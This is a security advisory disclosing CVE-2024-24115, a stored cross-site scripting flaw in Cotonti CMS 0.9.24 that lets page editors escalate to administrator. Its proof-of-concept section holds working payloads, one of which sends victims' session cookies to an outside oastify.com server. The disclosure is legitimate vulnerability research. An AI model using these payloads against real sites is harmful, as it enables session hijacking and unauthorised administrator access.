Mechaneus Security Research and Bug Hunting

View on GitHub

CVE-2024-24115: Stored Cross-Site Scripting (XSS) in Edit Page function in Cotonti CMS 0.9.24

https://github.com/Cotonti/Cotonti

Vulnerability Type

CWE-79: Cross-site Scripting (XSS) - Stored

CVSS 7.6 HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L

Description

A user that is in the moderator group or any group that can edit Pages, is able to inject malicious Javascript code to the Page and effectively steal the session cookie of any user, including any administrator’s

Execution steps

  1. A Member User is logged in and can edit a Page. (Example: the Welcome! page in the News category)
  2. A Member User is logged in and adds malicious code in the Page that has ‘parser’ switched to ‘none’.
  3. A Member User is logged in, views the Page but the malicious code is stored but not executed.
  4. A Member User is logged in, edits the Page and switches ‘parser’ to ‘html’.
  5. An Admin user is logged in and the malicious code is silently executed.
  6. The Attacker receives the cookie of the Admin that visits the Page.
  7. The stolen cookie belongs to an administrator and the Attacker has full access to the CMS.

Impact

A malicious user that is in the moderator group or any group that can edit Pages can escalate his privileges to any higher level group, including Administrators without being authorized. The malicious user can then create, edit and delete and content in the CMS, create new users with any privilege and disable users.

Proof of Concept code

Add some random text in HTML <p> tags and then:

  1. Pop-up the cookie with an alert:
    <script>alert(document.cookie)</script>
    

    ==OR ==

  2. Send the cookie to an Attacker controlled server:
    <img src=x onerror=this.src="http://5ekinbe9n3ta9w10ozijz91ex53wrmfb.oastify.com?c="+document.cookie />
    

References